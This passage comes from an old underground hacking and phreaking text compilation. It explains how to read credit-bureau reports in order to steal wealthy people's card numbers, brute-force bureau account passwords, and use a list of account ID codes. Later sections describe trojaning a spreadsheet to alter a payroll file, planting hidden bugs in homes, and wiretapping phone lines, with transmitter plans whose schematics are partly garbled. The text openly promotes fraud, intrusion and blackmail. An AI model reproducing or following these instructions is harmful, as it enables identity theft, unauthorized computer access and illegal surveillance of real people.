  2705. FA-68,PENN,ST,NOWHERE,IA,50055  ES-WALMART CORP
  2706.      SS-012-34-5678  AGE 38&
  2707.  
  2708. END OF REPORT    CBI AND AFFILIATES  -  01/30/91
  2709.  
  2710. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2711.                    E N D   S A M P L E   D T E C   R E P O R T
  2712. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2713.  
  2714.  
  2715. Part Six: Making Sense Out of All That.
  2716.     SMITH,ALAN,S - is the subject's last name, first name, and
  2717. middle initial. SINCE 04/00/75 - I imagine this is how long
  2718. they've had a file on the subject.  (Since April, 1975). On the
  2719. next line is his address- his current address is listed first,
  2720. and his past addresses are listed underneath.
  2721.     SEX-M is pretty self explanatory.  (It indicates he is a
  2722. MALE.) MAR-M is the subject's marital status (single, married,
  2723. widowed, divorced).
  2724.     DEPS- 2 is the number of dependents the subject has. A
  2725. dependant is most often a son or daughter of the subject who is
  2726. still under 21. SS-012-34-5678 is the subject's Social Security
  2727. Number. ES- is the subject's current employer.
  2728.     EF- are his past employers, listed in order, from most recent
  2729. to least recent.
  2730.     SUM-01/85-01/91 indicates that the report is a summary from
  2731. January 1985 to January 1991. This really just tells you how far
  2732. back in time the report covers.
  2733.     PR/OI-NO - Public Record/Other Information. This indicates
  2734. whether or not the subject has been involved in any court cases
  2735. (Public Record), and how those cases turned out (usually that is
  2736. what Other Information is.) Obviously, the NO indicates the
  2737. subject has not had any legal involvement during the period which
  2738. the report covers.
  2739.     FB-NO - Firm/Business. I assume this signifies the subject is
  2740. not a business.
  2741.     ACCTS:11,HC$6-1600 tells you that there are 11 entries listed
  2742. below, and that the credit limit (or amount loaned, in the case
  2743. of a loan) ranges from $6 to $1600.
  2744.     3-ONES - This tells you the credit rating. The "3" indicates
  2745. that there are 3 of the following type ("ONES" in this case). The
  2746. more "ONES" a subject has, the better his rating. This particular
  2747. person has a lousy credit rating. Out of 11 accounts, only 3 are
  2748. ONES. There can also be TWOS, THREES, FOURS, et cetera, up
  2749. through NINES. NINES are incredibly bad; the more of these the
  2750. subject has, the worse his credit rating is. ZEROS indicate that
  2751. the account was too new to be rated at the time the creditor last
  2752. reported.     INQS - This line tells what creditors have checked
  2753. on the subject's credit. While interesting, it is more of a
  2754. hassle than anything. You see, when YOU pull the subject's info,
  2755. a little line will be added saying that your hacked account
  2756. pulled the file. Now, this won't look funny until the subject
  2757. reports fraudulent charging on his card. Then, CBI may check on
  2758. who has pulled the guy's info. When they see that The First
  2759. National Bank of Ethiopia has pulled his info, they will know
  2760. something is up. They will probably call the First National Bank
  2761. of Ethiopia and say, "Did you pull this guy's info?" And of
  2762. course they'll say "No." Actually, I've made more out of this
  2763. than it's worth. Anyway, the most recent credit check is listed
  2764. first, and then it works backwards. It lists the ID CODE and the
  2765. date the file was pulled.
  2766.     The next line contains the headings for the columns that fall
  2767. under them.     BUS/ID CODE is the CBI account (minus the
  2768. password) of the creditor that holds the subject's credit card,
  2769. loan, or whatever. In front of the actual ID CODE, there is a
  2770. letter and an asterisk (*). The letter signifies what type of
  2771. account it is. A - Authorized, C - Co-maker, I - Individual, J -
  2772. Joint, S -Shared, T- Terminated, U - Undesignated. Consult your
  2773. Local Library to find out what each type of account is. This
  2774. isn't really relevant to what you are after.
  2775.     RPTD - The last time the creditor reported on the subject.    
  2776. OPND - tells when that account was opened.
  2777.     H/C - you will notice throughout the report that the "AMOUNT
  2778. IN H/C COLUMN IS CREDIT LIMIT".  On a loan, this column reports
  2779. the amount loaned.     TRMS - clarifies the terms of a loan.
  2780. Usually in the case of a credit card, this column is blank. A
  2781. "48M" in this column iiicates that the amount in the H/C column
  2782. will be paid back over a period of 48 months, or four years. In
  2783. such a case, the number in the MR column subtracted from the 48
  2784. will tell you how many more months the subject has to go before
  2785. paying off that loan.
  2786.     BAL is an abbreviation for BALANCE OWING.  This is how much
  2787. of the credit limit (on a credit card) has been used, or how much
  2788. of the loan has been paid back.  On a credit card entry, the BAL
  2789. subtracted from the H/C is how much the subject is authorized to
  2790. spend.
  2791.     P/D- Past Due.  Every month, a minimum amount of money is due
  2792. on your credit card payment.  This may be as little as 10% of the
  2793. total amount due.  Now, the credit card company would be damned
  2794. happy to see you only pay the minimum amount, because then they
  2795. can charge interest on every thing you owe.  But, if you do not
  2796. pay this minimum amount (say you pay $75 out of a $100 minimum),
  2797. then $25 will be PAST DUE. It isn't good to owe money.     RT -
  2798. Rating. This column gives the credit rating for that particular
  2799. account. An 'R' means the account is a revolving or option
  2800. payment plan, an 'I' means it is an installment payment plan, and
  2801. an 'O' means it is an open account. Consult your library for
  2802. definitions. The number following it is the credit rating for
  2803. that account. Remember, a '1' is good, and a '9' is really bad.
  2804. The number of '1's here should match the number "X" in "X-ONES"
  2805. on the first line.
  2806.     30/60/90 - the number in the 30 column means that the subject
  2807. has been between 30 and 59 days delinquent on his payment that
  2808. many times. If a "2" is in the 60 column, this indicates that the
  2809. subject has been between 60 and 89 days late with the minimum
  2810. payment twice during the number of months in the MR column. A
  2811. number in the 90 column would indicate that the minimum payment
  2812. has been over 90 days past due "X" number of times.     +MR -
  2813. Months Reviewed. Indicates how many months have been reviewed.
  2814. (Obviously.) Say you have a "1" in the 30 column, and a 49 in the
  2815. MR column. This indicates that the subject has been 30-59 days
  2816. late with the minimum payment in the past 49 months. It's not
  2817. really too hard to understand.
  2818.  
  2819.     DLA/ACCOUNT NO - This column contains the credit card
  2820. numbers. Visa and Mastercard both have 16 digits. American
  2821. Express (Amex) hs 13 digits. DLA is the Date Last Activity. If
  2822. there is a date in this column, it is NOT a credit card
  2823. expiration date, it is telling you the last time that account was
  2824. active.
  2825.     PREV HI RATES - This indicates the past ratings of the
  2826. account on the date listed.
  2827.  
  2828.     Explanation of the DTEC report:
  2829.  
  2830.     "1 of 1" means that the first report of one is being listed.
  2831. Remember, no two people have the same Social Security Numbers. NM
  2832. is the subject's name. CA is the subject's current address. The
  2833. date at the end of this line should match the most recent date on
  2834. the address line in the subject's full report. The FA line lists
  2835. former addresses. The ES line lists the subject's current
  2836. employer. Following this is the subject's Social Security Number,
  2837. which you must have already had to get the DTEC report. And
  2838. lastly, the subject's age.
  2839.  
  2840.  
  2841. Part Seven: Practical Use of CBI.
  2842.  
  2843.     You may have a question now, "Whose file do I pull?" You want
  2844. to pull the file of someone who is rich. Usually Lawyers and
  2845. Doctors will fit the bill. Look in the Yellow Pages under
  2846. "Lawyers" and "Doctors" and find the names of some upper class
  2847. bastards. You can use your local White Pages to cross-reference
  2848. and get their home addresses. From here, you call CBI, and pull
  2849. their file.
  2850.     Once you get the file, look in the DLA/ACCOUNT NO column.
  2851. Find all the 13 and 16 digit numbers. 16 digit numbers starting
  2852. with "4" are Visas. 16 digit numbers starting with "5" are
  2853. Mastercards. 13 digit numbers starting with "37" are American
  2854. Express. The first four digits of the card number signify the
  2855. bank that issued the card. A list is supplied below, taken from
  2856. the Narc Infofile #7, Update A. I have not done any work toward
  2857. verifying these myself, either.
  2858.  
  2859. VISA
  2860. ----
  2861. 4428  Bank of Hoven
  2862. 4128  Citibank           CV
  2863. 4271  Citibank           PV
  2864. 4929  Barclay Card       CV  (from England)
  2865. 4040  Wells Fargo        CV
  2866. 4019  Bank of America    CV
  2867. 4024  Bank of America    PV or CV
  2868. 4019  Bank of America    Gold (This card looks like a CV but
  2869. without a CV after                                 the expiration
  2870. date)
  2871. 4678  Home Federal
  2872. 4726  Wells Fargo        CV
  2873. 4036
  2874. 4561
  2875. 4443
  2876. 4833
  2877. 4424  Security Pacific National Bank
  2878. 4428  Choice Visa    [Citibank(Maryland)]???
  2879. 4070
  2880. 4735
  2881. 4673
  2882. 4044
  2883. 4050
  2884. 4226  Chase Manhattan Bank
  2885. 4605
  2886. 4923
  2887. 4820
  2888. 4048                     CV
  2889. 4121  Signet Bank        CV
  2890. 4368
  2891.  
  2892.  
  2893. Mastercard
  2894. ----------
  2895. 5419  Bank of Hoven
  2896. 5410  Wells Fargo
  2897. 5412  Wells Fargo
  2898. 5273  Bank of America             Gold
  2899. 5273  Bank of America
  2900. 5254  Bank of America
  2901. 5286  Home Federal
  2902. 5031  Maryland Bank of North America
  2903. 5326
  2904. 5424  Citibank
  2905. 5250
  2906. 5417
  2907. 5215
  2908. 5204
  2909. 5465  Chase Manhattan Bank
  2910. 5411
  2911. 5421
  2912. 5329  Maryland Bank of North 5308
  2913. 5217
  2914. 5415
  2915. 5291  Signet Bank
  2916.  
  2917. American Express
  2918. ----------------
  2919. 3728      GOLD
  2920. 3713      Regular
  2921. 3732      Regular
  2922. 3737
  2923. 3782      Small Corporate Card
  2924. 3731
  2925. 3724
  2926. 3742
  2927. 3727
  2928. 3787      Small Corporate Card
  2929. 3726
  2930. 3766
  2931. 3734
  2932. 3749
  2933. 3763
  2934. 3710
  2935. 3718
  2936. 3720
  2937. 3739
  2938.  
  2939.     At this point, your rendezvous with CBI is complete.  Write
  2940. the credit card number you obtained, and the subject's basic info
  2941. in your notebook.  Destroy the CBI report you have- there's no
  2942. need to have evidence sitting around.
  2943.  
  2944.  
  2945. Part Eight:  Getting the CBI account.
  2946.  
  2947.     Okay kids, here's the hard part. Actually, it's not very hard
  2948. at all. Just time consuming. First, you have to find an ID CODE.
  2949. You know, the part of the account BEFORE the dash. Remember, the
  2950. part following the dash is the password. To get the ID CODE, go
  2951. trashing at a car dealership. You should find some printed out
  2952. reports. On these reports (they should look like what I supplied
  2953. above), you will find the "usernames" in the BUS/ID CODE column,
  2954. and in the INQS line. All you have to add to this ID CODE is the
  2955. password (obviously). Remember, the password is a letter and a
  2956. number. So, say your ID CODE is 123ab4567. When CBI asks you to
  2957. PLEASE SIGN ON, you begin hacking. Two common passwords are -c2
  2958. and -c3. So, the first two things you try to enter should be
  2959. "123ab4567-c2. ^S <CR>" and "123ab4567-c3. ^S <CR>". If neither
  2960. of these work, start at "123ab4567-a1." and work to "123ab4567-
  2961. z9." If I don't find something by the time I get hrough -d9, I
  2962. will usually pick another ID CODE and start over. You can do it
  2963. however you like.     The lazy way to do this is hang around on
  2964. QSD with the sex freaks and see if you can find someone who will
  2965. trade with you. Chances are you'll get screwed, because almost
  2966. everyone there is a leech. They'll either give you something
  2967. fake, or nothing at all. If you want to trade, there are more
  2968. trustworthy and knowledgeable people on Lucifer.
  2969.  
  2970.  
  2971. Part Nine: ID CODEs.
  2972.  
  2973.    This section is a list of ID CODEs for you to hack on. This
  2974. list is taken from The Ghost's file on CBI, because I am too lazy
  2975. to make up my own list.
  2976.  
  2977. 426DC33     465IG14     444BB7072   906ON259    906ON267
  2978. 906BB5130   458ON2792   906BB206    444FP289    882AN137
  2979. 444FS1399   843BB342    404BB539    404DC21     496ON747
  2980. 496BB82     404CG94     426DC1577   401BB4880   872BB213
  2981. 444FS1381   728B10420  905BB587    496ON598    426BB756
  2982. 426BB3859   444BB3469   444BB3626   444BB5605   444FP2137
  2983. 906FA26     906BB115    906BB40     906FM6418   447FS844
  2984.  
  2985. 906BB289    496ON291    901BB5101   906FM6335   496ON218
  2986. 458ON3022   402RE30375  426CG544    872BB31     872BB205
  2987. 444BB143    444BB6173   444FM11838  458ON3014   155ON44
  2988. 905ON1497   444ZB361    496ON648    444BB5654   496BB587
  2989. 906CG2913   444BB5704   416FM2092   444BB465    444BB5282
  2990. 444BB5308   444BB5290   404FF262    906FF278    906FF260
  2991. 404FF1039   404FF825    906FF252    426DC561    181FS320
  2992.  
  2993. 444FA483    906FA34     163DC2280   444BB2719   163BB17526
  2994. 404HZ141    444AN1082   444ZB00577  906DC185    444DC10639
  2995. 906DC193    444JA591    906DC151    444DC49     405BB280
  2996. 801ON119    801BB2942   496BB74     496FM271    426BB238
  2997. 426BB541    426BB1895   426BB2406   444BB804    444BB3253
  2998. 444BB9466   906OC99     404BB3483   444BB1315   444FM12285
  2999. 805BB2492   906DC656    444FA848    444BB6173   444BB1869
  3000.  
  3001. 444YC1311   444BB6363   444BB6496   444BB564    444BB3436
  3002. 444BB952    891BB186    496ON44     444AN2452   444CS315
  3003. 906DC29     444DC510    905DC3081   180BB19097  444CG377
  3004. 496FZ45     404TZ19     444AN4177   906DM10     403DC1426
  3005. 496DC319    496DC20     444KI54     606OC10587  414BB917
  3006. 906FA67     444FA814    444BB5035   444BB9466   444BB978
  3007. 444BB2248   444BB1182   444BB4491   444ON366    444ON200
  3008.  
  3009. 444ON358    444ON341    404HF375    444AN4491   496FS380
  3010. 404BB182    155ON85     163BB19418  444ZB668    801ON1182
  3011. 444BB2958   444BB1331   465ZB134
  3012.  
  3013. I haven't collected these myself, so I don't know if they all are
  3014. valid.                  File grabbing on large systems
  3015.  
  3016. Definitions: 
  3017.  
  3018. Salami......Program that takes a selected amount of money from a
  3019. group of specified accounts and deposits it into another account.
  3020.  
  3021.  
  3022. Trojan......Program that does one honest function but meanwhile
  3023. caries out a series of secret commands.
  3024.   
  3025. Say you are working for a company that uses a large central
  3026. computer network that is slightly old. You want to get at the
  3027. accounts file to make your self a salami. Most old systems have
  3028. two pointers at the head of the file, a write access and a read
  3029. access. The write means you can edit and delete the file while
  3030. the copy mean you can only run and copy the file. Your goal is to
  3031. gain write access to the accounts file. The best form of action
  3032. would be to take a program everybody has read access to (data
  3033. base, spreadsheet, whatever) and make a trojan out of it.
  3034. Probably the spreadsheet would be the best idea since the
  3035. accountant must use it a lot. The first problem you are going to
  3036. have is that you are only going to have read access to the
  3037. spreadsheet program because all you need to do is run it.
  3038. (Business policy is to give no more access than is needed.) So
  3039. you make a file and give your self read and write access to it.
  3040. Then simply copy the spreadsheet file into your file. You can now
  3041. edit the spreadsheet and add a feature to it (diagonal adding or
  3042. something make it VERY attractive). Then you add a little trojan
  3043. to the program that copies the accounts file to a file in your
  3044. directory, then copies another file from your directory in place
  3045. of the true accounts fie. You then give the spreadsheet program
  3046. to the accountant showing him the new feature and hope to God he
  3047. likes it. When he uses your spreadsheet program you will get the
  3048. accounts file in your directory. You should write a program and
  3049. leave it in memory so that as soon as it sees this file it copies
  3050. it into the other file name so your trojan can copy the other
  3051. file back the first time with out error. Once this has happened
  3052. delete the TSR program and edit the accounts file as you please.
  3053. You can then rename it to the file in your directory the trojan
  3054. copies back and your payroll will be changed!
  3055.                             Potpourri                               BUGS
  3056.    As far as bugs go, don't worry about not being able to obtainthem. Sure, there are some suppliers around that only sell to
  3057. 'Law Enforcement Agencies' only, but most will sell to you, so
  3058. there is no reason to bother with social engineering yourself
  3059. one. Anyway, most suppliers that will only sell to law
  3060. enforcement agencies usually have their products so marked up,
  3061. its unrealistic. Good bargains, and very high quality equipment
  3062. can be found offered by a Japanese company called CONY. Usually
  3063. their products are so reasonable that it makes the competitors
  3064. cry in shame. I suggest you write to them.
  3065.  
  3066.                           CONY MFG CORP
  3067.                        Rm 301 Hirooka Bldg
  3068.                          No 59, 2 Chome
  3069.                           Kangetsu cho
  3070.                         Chikusa ku Nagoya
  3071.                             464 JAPAN
  3072.  
  3073.  
  3074.                    WHERE AND HOW TO STICK THEM
  3075.  
  3076.      Assuming you obtain a bug, or any combination of different
  3077. types of bugs, you will want to use them, for any number of
  3078. particular purposes. The safest and easiest way to plant a is to
  3079. send the person that you want to know better a nice gift with you
  3080. know what hidden inside it. Something that they could, say, place
  3081. on their desk, or display prominently in their place or work or
  3082. residence. Wrap it nice, and include a small card, and do
  3083. whatever you feel is appropriate. A more dangerous method is to
  3084. actually obtain entry into the office or residence of the person
  3085. that you want to know better. If you have success in getting in,
  3086. planting it, and getting out unnoticed, then you will be safe.
  3087. Once a is planted, you will leave it there even after it becomes
  3088. inoperative, because, if you have placed considerable risk on
  3089. yourself to plant it, you do not want to go through that risk
  3090. again just to retrieve it. Just forget about it. It won't miss
  3091. you. There are a number of places to hide your electronic friend:
  3092. o Carefully [!] unscrew a wall socket. There, you will notice
  3093. some extra, unused space inside. Figure out the rest.
  3094.  
  3095. o Do like the shows on TV. Hide them under a table, or chair. Let
  3096. your imagination run wild [use good judgement]. You are
  3097. relatively free, due to today's technology, and the short
  3098. antennas. Pick an area that is not subject to 'search or routine
  3099. cleaning'.
  3100. o Dress up like a workman and show up at their house. Make up a
  3101. good excuse. Gain access. Plant it.
  3102.  
  3103. UTILIZATION
  3104.  
  3105.    You will want to record all that you can get with this for
  3106. later review. Also, take into consideration, that you can't be at
  3107. the receiver 24 hours a day. The setup to use for maximum
  3108. efficiency is a recorder with a VOX. Therefore, tape waste will
  3109. be at a bare minimum. That's also good, because you don't want to
  3110. be at the receiver just to flip tapes every half hour to 45
  3111. minutes. Also, it would be difficult to review these tapes,
  3112. becasse you would have to listen to a half hour recording for an
  3113. actual half hour, and so on. Well, those half hours will add up
  3114. into hours, into hours, into hours. Not smart. As said, invest in
  3115. a VOX. This will make it able to have the recorder skip over
  3116. those quiet times in your target's house. To save tape you could
  3117. slow down the recorder with electronics, if you have the
  3118. electronics. You might not be successful, because it becomes
  3119. difficult to tell the speech of people from background noise.
  3120. Please note that not every technique is discussed here. This is a
  3121. scratch of the surface. If you can, use metal tapes [if the
  3122. recorder has that capability]. If not, use low noise/extended
  3123. range tapes. As with most surveillance equipment, be sure that
  3124. you know what you are doing. This is a game in which you can be
  3125. charged hundreds of dollars for something that you could do
  3126. yourself with 35 bucks. Some companies sell recorders which claim
  3127. to be able to record 14 hours on a standard cassette. They have
  3128. simply removed the pulley from the drive shaft of a Panasonic or
  3129. Sony recorder that costs less than 50 dollars and jacked up the
  3130. price 300%. Try it yourself, save money.
  3131.  
  3132. ADVANCED TECHNOLOGY
  3133.  
  3134.    There is a nice device called a shotgun mic that allows you to
  3135. point it at a window and listen in on a conversation in the
  3136. immediate room, because of the room's sound waves causing the
  3137. window glass to vibrate. The window must be closed. Since all you
  3138. have to do is point it and go, well, they become obviously
  3139. convenient. And fun. Find one. They might cost a litle more, but
  3140. worth it. And the target is not likely to know he is being
  3141. watched, so he will not be smart enough to enact countermeasures.
  3142.  
  3143.  
  3144.                            WIRETAPPING
  3145. Everyone has at sometime wanted to hear what a friend, the
  3146. principal, the prom queen, or a neighbor has to say on the phone.
  3147. There are several easy ways to tap into a phone line. None of the
  3148. methods that I present will involve actually entering the house.
  3149. You can do everything from the backyard. I will discuss four
  3150. methods of tapping a line. They go in order of increasing
  3151. difficulty. 1. The " beige box ": a beige box (or bud box) is
  3152. actually better known as a "lineman" phone. They are terribly
  3153. simple to construct, and are basically the easiest method to use.
  3154. They consist of nothing more than a phone with the modular plug
  3155. that goes into the wall cut off, and two alligator clips attached
  3156. to the red and green wires. The way to use this box, is to
  3157. venture into the yard of the person you want to tap, and put it
  3158. onto his line. This is best done at the bell phone box that is
  3159. usually next to the gas meter. It should only have one screw
  3160. holding it shut, and is very easily opened. Once you are in, you
  3161. should see 4 screws with wires attached to them. If the house has
  3162. one line, then clip the red lead to the first screw, and the
  3163. green to the second. you are then on the "tappee's" phone. You
  3164. will hear any conversation going on. I strongly recommend that
  3165. you remove the speaker from the phone that your using so the
  3166. "tappee" can't hear every sound you make. If the house has two
  3167. lines, then the second line is on screws three and four. If you
  3168. connect everything right, but you don't get on the line, then you
  3169. probably have the wire's backward. Switch the red to the second
  3170. screw and the green to the first. If no conversation is going on,
  3171. you may realize that you can't tap the phone very well because
  3172. you don't want to sit there all night, and if you are on the
  3173. phone, then the poor tappee can't dial out, and that could be
  3174. bad...so....... method two. 2. The recorder: This method is
  3175. probably the most widespread, and you still don't have to be a
  3176. genius to do it. There are LOTS of ways to tape conversations.
  3177. The two easiest are either to put a "telephone induction pickup"
  3178. (radio shack $1.99) on the beige box you were using, then
  3179. plugging it into the microphone jack of a small tape recorder,
  3180. and leaving it on record. Or plugging the recorder right into the
  3181. line. This can be done by taking a walkman plug, and cutting off
  3182. the earphones, then pick one of the two earphone wires, and strip
  3183. it. There should be another wire inside the one you just
  3184. stripped. Strip that one too, and attach alligators to them. Then
  3185. follow the beige box instructions to tape the conversation. In
  3186. order to save tape, you may want to use a voice activated
  3187. recorder (Radio shack $59), or if your recorder has a "remote"
  3188. jack, you can get a "telephone recorder control" at Radio shack
  3189. for $19 that turns the recorder on when the phone is on, and off
  3190. when the phone is off. This little box plugs right into the wall
  3191. (modularly of course), so it is best NOT to remove the modular
  3192. plug for it. Work around it if you can. If not, then just do you
  3193. best to get a good connection. When ecording, it is good to keep
  3194. your recorder hidden from sight (in the bell box if possible),
  3195. but in a place easy enough to change tapes from.  The wireless
  3196. microphone: this is the tap. It transmits a signal from the phone
  3197. to the radio (Fm band). You may remember Mr microphone (from
  3198. kaytel fame), these wireless microphones are available from radio
  3199. shack for $19. They are easy to build and easy to hook up. There
  3200. are so many different models, that it is almost impossible to
  3201. tell you exactly what to do. The most common thing to do, is to
  3202. cut off the microphone element, and attach these two wires to
  3203. screws one and two. the line MIGHT, depending on the brand, be
  3204. "permanently off hook" this is bad, but by mucking around with it
  3205. for a while, you should get it working. There are two drawbacks
  3206. to using this method. One, is that the poor asshole who is
  3207. getting his phone tapped might hear himself on "FM 88, the
  3208. principal connection". The second problem is the range. The store
  3209. bought transmitters have a VERY short range. I suggest that you
  3210. build the customized version I will present in part four (it's
  3211. cheaper too). Now on to the best of all the methods.... 4. The
  3212. "easy-talks": This method combines all the best aspects of all
  3213. the other methods. It only has one drawback... You need a set of
  3214. "Easy-talk" walkie talkies. They are voice activated, and cost
  3215. about $59. You can find them at toy stores, and "hi-tech"
  3216. catalogs. I think that any voice activated walkie talkies will
  3217. work, but I have only tried the easy-talks. First, you have to
  3218. decide on one for the "transmitter" and one for the "receiver".
  3219. It is best to use the one with the strongest transmission to
  3220. transmit, even though it may receive better also. Desolder the
  3221. speaker of the "transmitter", and the microphone of the
  3222. "receiver". now, go to the box. put the walkie talkie on "VOX"
  3223. and hook the microphone leads (as in method three) to the first
  3224. and second screws in the box. Now go home, and listen on your
  3225. walkie talkie. if nothing happens, then the phone signal wasn't
  3226. strong enough to "activate" the transmission. If this happens
  3227. there are two things you can do. One, add some ground lines to
  3228. the microphone plugs. This is the most inconspicuous, but if it
  3229. doesn't work then you need an amplifier, like a walkman with two
  3230. earphone plugs. Put the first plug on the line, and then into one
  3231. of the jacks. Then turn the volume all the way up (w/out pressing
  3232. play). Next connect the second earphone plug to the mice wires,
  3233. and into the second earphone outlet on the walkman. now put the
  3234. whole mess in the box, and lock it up. This should do the trick.
  3235. It gives you a private radio station to listen to them on, you
  3236. can turn it off when something boring comes on, and you can tape
  3237. off the walkie talkie speaker that you have!
  3238.  
  3239. WIRELESS TRANSMITTER PLANS
  3240.  
  3241. Here the plans for a tiny transmitter that consists on a one
  3242. colpitts oscillator that derives it's power from the phone line.
  3243. Since the it puts on the line is less than 100 ohms, it has no
  3244. effect on the telephone performance, and can not be detected by
  3245. the phone company, or the tappee. Since it is a low-powered
  3246. device using no antenna for radiation, it is legal to the FCC.
  3247. (That is it complies with part 15 of the FCC rules and
  3248. regulations). It, however is still illegal to do, it's just that
  3249. what your using to do it is legal. This is explained later in
  3250. part 15... "no person shall use such a device for eavesdropping
  3251. unless authorized by all parties of the conversation" (then it's
  3252. not eavesdropping is it?). What this thing does,is use four
  3253. diodes to form a "bridge rectifier". It produces a varying dc
  3254. voltage varying with the auto-signals on the line. That voltage
  3255. is used to supply the voltage for the oscillator transistor.
  3256. Which is connected to a radio circuit. From there, you can tune
  3257. it to any channel you want. The rest will all be explained in a
  3258. minute....
  3259.    PARTS LIST        DESCRIPTION
  3260.  
  3261. C1                  | 47-Pf ceramic disk capacitor
  3262. C2,C3               | 27-Pf mica capacitor
  3263. CR1,CR2,CR3,CR4     | germanium diode 1n90 or equivalent
  3264. R1                  | 100 ohm, 1/4 watt 10% composition resistor
  3265. R2                  | 10k, 1/4 watt 10% composition resistor 
  3266. R3                  | .7k, 1/4 watt 10% composition resistor
  3267. L1                  | 2 uH radio frequency choke (see text)
  3268. L2                  | 5 turns No.20 wire (see text)
  3269. Q1                  | Npn rf transistor 2N5179 or equivalent
  3270.  
  3271. One may be constructed by winding approximately 40 turns of No.
  3272. 36 enamel wire on a megohm, 1/2 watt resistor. The value of L1 is
  3273. not critical. L2 can be made by wrapping 5 turns of No. 20 wire
  3274. around a 1/4 inch form. After the wire is wrapped, the form can
  3275. be removed. Just solder it into place on the circuit board. It
  3276. should hold quite nicely. Also be sure to position Q1 so that the
  3277. Emitter, Base, and collector are in the proper holes. The
  3278. schematic should be pretty easy to follow. Although it has an
  3279. unusual number of grounds, it still works. 
  3280.  
  3281.                  |------------------L1----------------|
  3282.                  --                                    |
  3283.             CR1 /  \ CR2              |----------------|
  3284. A--------------/    \ --|         ----|          |     |
  3285.        |       \    /   |         |   |          C2    L2
  3286.        |    CR3 \  /CR4 |         C1  R2    |----|     |
  3287.       R1         --     |         |   |    gnd   C3    |
  3288.        |         |      |         ----|          |-----|
  3289.        |        gnd     |             |                |
  3290.        |                |             |-----|----Base  collector  
  3291.      |                |                   R3     \   /
  3292. B-----------------------|                   |       \/\ <- Q1     
  3293.                                       gnd       \/
  3294.                                                      |
  3295.                                                      |
  3296.                                                     emitter(gnd)
  3297.  
  3298.  
  3299. One odd thing about this  that we haven't encountered yet, is
  3300. that it is put on only one wire (either red or green) so go to
  3301. the box, remove the red wire that was ALREADY on screw #1 and
  3302. attack it to wire 'A' of the  then attach wire 'B' to the screw
  3303. itself. you can adjust the frequency which it comes out on (the
  3304. FM channel by either tightening, or widening the coils of L2. It
  3305. takes a few minutes to get to work right, but it is also very
  3306. versatile. You can change the frequency at will, and you can
  3307. easily record off your radio. HELPFUL HINTS
  3308. First of all, With method one, the beige box, you may notice that
  3309. you can also dial out on the phone you use. I don't recommend
  3310. that you do this. If you decide to anyway, and do something
  3311. conspicuous like set up a 30 person conference for three hours,
  3312. then I suggest that you make sure the people are either out of
  3313. town or dead. In general when you tap a line, you must be
  3314. careful. I test everything I make on my line first, then install
  3315. it late at night. I would not recommend that you leave a recorder
  3316. on all day. Put it on when you want it going, and take it off
  3317. when your done. As far as recording goes, I think that if there
  3318. is a recorder on the line it sends a sporadic beep back to the
  3319. phone co. I know that if you don't record directly off the line
  3320. (i.e off your radio) then even the most sophisticated equipment
  3321. can't tell that your recording. Also, make sure that when you
  3322. install something the people are NOT on the line. Installation
  3323. tends to make lots of scratchy sounds, clicks and static. It is
  3324. generally a good thing to avoid. It doesn't take too much
  3325. intelligence to just make a call to the house before you go to
  3326. install the thing. If it's busy then wait a while. (This of
  3327. course does not apply if you are making a "midnight run").  All
  3328. in all, if you use common sense, and are *VERY* Careful, chances
  3329. are you won't get caught. Never think that you're unstoppable,
  3330. and don't broadcast what your doing. Keep it to yourself, and you
  3331. can have a great time.                             Lunch Box
  3332. The Lunch Box is a VERY simple transmitter which can be handy for
  3333. all sorts of things. It is quite small and can easily be put in a
  3334. number of places. I have successfully used it for tapping phones,
  3335. getting inside info, blackmail and other such things. The
  3336. possibilities are endless. I will also include the plans for an
  3337. equally small receiver for your newly made toy. Use it for just
  3338. about anything. You can also make the transmitter and receiver
  3339. together in one box and use it as a walkie talkie.
  3340.  
  3341. Materials you will need
  3342. =======================
  3343.  
  3344. 1 9 volt battery with battery clip
  3345. 1 25-mfd, 15 volt electrolytic capacitor
  3346. 2 0.0047 mfd capacitors
  3347. 1 0.022 mfd capacitor
  3348. 1 51 pf capacitor
  3349. 1 365 pf variable capacito
  3350. 1 Transistor antenna coil
  3351. 1 2N366 transistor
  3352. 1 2N464 transistor
  3353. 1 100k resistor
  3354. 1 5.6k resistor
  3355. 1 10k resistor
  3356. 1 2meg potentiometer with SPST switch
  3357. Some good wire, solder, soldering iron,
  3358. board to put it on, box (optional) Schematic for The Lunch Box
  3359.  
  3360. This may get a tad confusing but just
  3361. print it out and pay attention.]
  3362.  
  3363.          [!]
  3364.           !
  3365.         51 pf
  3366.           !                  BASE
  3367.        ---+----  ------------COLLECTOR
  3368.       !        )(               2N366
  3369. +----+------/\/\/----GND
  3370.     365 pf     ()              emitter           !
  3371.       !        )(                 !              !
  3372.       +--------  ---+----         !              !
  3373.       !             !    !        !              !
  3374.      GND            /  .022mfd    !              !
  3375.                  10k\    !        !              !
  3376.                     /   GND
  3377. +------------------------emitter
  3378.                     !             !              !
  3379.     2N464
  3380.                     /           .0047            !
  3381. base   collector
  3382.               2meg  \----+        !              !
  3383. +--------+       !
  3384.                     /    !       GND             !   !
  3385.         !
  3386.                         GND                      !   !
  3387.         !
  3388.         +-------------+.0047+--------------------+   !
  3389.         !
  3390.                                                      !
  3391. +--25mfd-----+
  3392.         -----------------------------------------+   !
  3393.           !
  3394.        microphone
  3395. +--/\/\/-----+
  3396.             ---------------------------------------------+
  3397.  100k     !
  3398.  
  3399.           !
  3400.  
  3401. GND---->/<---------------------!+!+!+---------------+
  3402.                         switch                  Battery
  3403.                     from 2meg pot.
  3404.  
  3405.  
  3406. Notes about the schematic
  3407.  
  3408. 1.  GND means ground
  3409. 2.  The GND near the switch and the GND by the 2meg potentiometer
  3410. should be connected
  3411. 3.  Where you see:  )(
  3412.                    ()
  3413.                     )( it is the transistor antenna coil with 15
  3414. turns of  regular hook-up wire around it.
  3415. 4.  The middle of the loop on the left side (the left of "()")
  3416. you should run a wire down to the "+" which has nothing attached
  3417. to it. There is a .0047  capacitor on the correct piece of wire.
  3418. 5.  For the microphone use a magnetic earphone (1k to 2k).
  3419. 6.  Where you see "[!]" is the antenna. Use about 8 feet of wire
  3420. to broadcast approx 300ft. Part 15 of the FCC rules and
  3421. regulation says you can't broadcast over 300 feet without a
  3422. license. (Hahaha). Use more wire for an antenna for longer
  3423. distances. (Attach it to the black wire on the phone line for
  3424. about a 250 foot antenna!)
  3425.  
  3426. Operation of the Lunch Box
  3427.  
  3428. This transmitter will send the signals over the AM radio band.
